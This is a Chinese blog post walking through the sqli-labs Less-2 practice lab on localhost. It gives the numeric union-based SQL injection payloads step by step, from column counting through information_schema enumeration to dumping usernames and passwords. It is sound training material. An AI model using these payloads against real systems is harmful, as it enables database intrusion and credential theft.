sqli-labs/Less-2注入

最新推荐文章于 2024-09-13 19:41:32 发布
最新推荐文章于 2024-09-13 19:41:32 发布
阅读量96 收藏
点赞数
分类专栏: sql-labs靶机 文章标签: 安全 mysql windows php firefox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50339082/article/details/118067053
版权
本文详细介绍了SQL注入攻击的一种常见场景,通过sqli-labs的Less-2关卡进行实战演练。首先判断输入类型为数字型,接着确定字段位数、占位信息,然后通过信息获取了数据库名、表名及字段名。最终成功找出账号密码信息,揭示了SQL注入的危害及防范措施。
摘要由CSDN通过智能技术生成

sqli-labs/Less-2注入

Sali-lsbs第二关

1、先判断是字符型还是数字型。

http://127.0.0.1/sqli-labs/Less-2/?id=4

在这里插入图片描述

127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2

在这里插入图片描述
结果一样,说明是数字型。

2、确认字段位数

http://127.0.0.1/sqli-labs/Less-2/?id=3  order by 4

在这里插入图片描述

127.0.0.1/sqli-labs/Less-2/?id=3 order by 3

在这里插入图片描述
一共3位

3、确认占位信息

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 	--+

注释符:-- (后面有空格)(也就是–+)
在这里插入图片描述
4、找库名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select database(),2,3 --+

在这里插入图片描述
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),3
在这里插入图片描述
库名是security

5、找表名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'		--+

在这里插入图片描述
表名有emails、referers、uagents、users

6、找字段名

127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

在这里插入图片描述
users表里有id、username、password三个字段

7、找账号密码信息

127.0.0.1/sqli-labs/Less-2/?id=-1	union	select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users

separator 默认是逗号 “,”,我这里用的"|"
在这里插入图片描述

weixin_50339082
关注
专栏目录
SQL注入sqlilabs:less-1
Dmajorcanon的博客
02-21 3757
sqlilabs个人练习及解题思路√
SQLsqli-labs注入Less-2~4
Nuyoah的博客
12-13 455
与Less-1相同,我们同样使用?id=1'看是否可以注入, 发现不可以,并且提示错误,我们可以知道,这里多加了一个引号,这就是与Less-1不同的地方,除此之外,以下步骤与Less-1相同 2.接下来我们使用 order by 查看有多少列 仍然有三列3.使用联合查询 union select 看有哪些数据可以回显 4.接下来查询所有数据库 5.继续查询表 6.再查询列 7.最后取出所有数据 ...
sql-labs通关全解---有关二次注入--less24--9
cyynid的博客
01-13 231
二次注入的原理,在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_escape_string、mysql_real_escape_string等函数对其中的特殊字符进行了转义,但是addslashes有一个特点就是虽然参数在过滤后会添加 “\” 进行转义,但是“\”并不会插入到数据库中,在写入数据库的时候还是保留了原来的数据。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。
sqli-labs-less-2完整教程
yzcn
10-22 1761
Less-2 开始判断是否存在漏洞: http://127.0.0.1/sqli-labs-master/Less-2/?id=1 显示成功 http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ 显示失败,错误:’’ LIMIT 0,1’,表示在左边多了一个单引号, http://127.0.0.1/sqli-labs-master/Less-2/?id=1’ --+ 进行注释后还是错误 http://127.0.0.1/sqli-labs-master
LESS2(sql注入
qq_44598397的博客
03-14 929
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs/Less-2
m0_71299382的博客
11-09 117
sqli-labs第二关
sqli-labs-master/Less-5
fym123465的博客
12-21 394
这里的命令是把database() 换成了 table_name这个命令应该都知道是啥意思对吧,然后就是tables_schema='security'就是在''里面加上表名,然后就是limit 0,1 这里就是看结果的了0,1是emails 1,1就是别的表名了。如果按照平常做法的话我们就应该去进行查找字段了,我们演示一下经过我们的测试发现了四个字段命令是 order by 1,2,3,4 到4 的时候会出现报错,我们就知道了字段有3个。我们有了表名我们继续查询列。我们有了表明了我们直接访问。
SQL注入——sqli-labs-Less-9时间盲注_sqliless9
2401_87034325的博客
09-12 452
测得第二位是ASCII码101,是字母“e”依次穷举类推,判断出来数据库名为security,库名长度8位。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1838
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1408
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 711
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1200
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 711
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
AI在医学领域:医学AI的安全与隐私全面概述
声纹感知 洞察芯声
09-12 1408
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
【双语新闻】AGI安全与对齐,DeepMind近期工作
最新发布
qq_29883477的博客
09-13 1017
的开发和运行,包括危险能力评估)。这还没有达到我们的需求:诚实策略的时间复杂度只在人类可判断的论证长度上是多项式的,而我们希望它在AI可判断的论证长度上是高效的。我们已经看到了一些使用Tracr的例子,但其使用的范围并没有如我们所希望的那样广泛,因为由Tracr生成的模型与在野外训练的模型有很大的不同。:尽管这项工作未能实现其雄心勃勃的目标,即在超置的早期MLP层中机械地理解事实是如何计算的,但它确实提供了进一步的证据表明超置正在发生,并否定了关于事实回忆可能如何运作的一些简单假设。
Boot header格式描述详细信息。CSU DMA用于数据传输。安全流开关允许数据移动。PL配置通过PCAP接口。PL bit流包含设备配置数据。
lsh11111的博客
09-13 452
此外,BootROM可以使用8位并行配置中的宽度检测参数值和image识别参数值来检测Quad-SPI接口的预期I/O宽度。在Quad-SPI引导过程中,BootROM会根据宽度检测参数值来选择相应的I/O配置,以确保正确访问Quad-SPI设备。- Reserved for interrupts: 用于存储中断相关信息,特别是在LQSPI地址空间中的默认0x01F中断向量被更改时,在XIP启动模式下使用。- 安全头初始化向量: 用于PMU FW和FSBL的安全头的初始化向量。
2024网络安全人才实战能力白皮书安全测试评估篇
2301_76786857的博客
09-13 760
据了解,白皮书通过大量一线网络安全从业人员、网络安全相关专业在校学生问卷调研数据及网络安全人才测评演练数据分析,呈现供给侧、需求侧安全测试评估人才的基本情况、培养情况和岗位实践,并以理论与实践相结合的方式创新提出了一套立体化综合评价安全测评人才能力的——GPE方法,为数字中国建设中的安全测试评估人才培养和评价提供可行方案。当前,在政治、经济、文化和社会安全等多个领域相互交织影响的背景下,网络安全测评是政府保障国家安全和社会稳定的重要手段之一,社会急需网络安全测评人才,防范化解风险提供安全保障。
sqli-labs/Less-28
01-09
sqli-labs是一个用于学习和实践SQL注入的实验平台。Less-28是其中的一个实验,它是基于GET请求的盲注注入漏洞。在这个实验中,我们需要利用字符串单引号和括号来进行注入。 具体步骤如下: 1. 打开sqli-labs实验...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值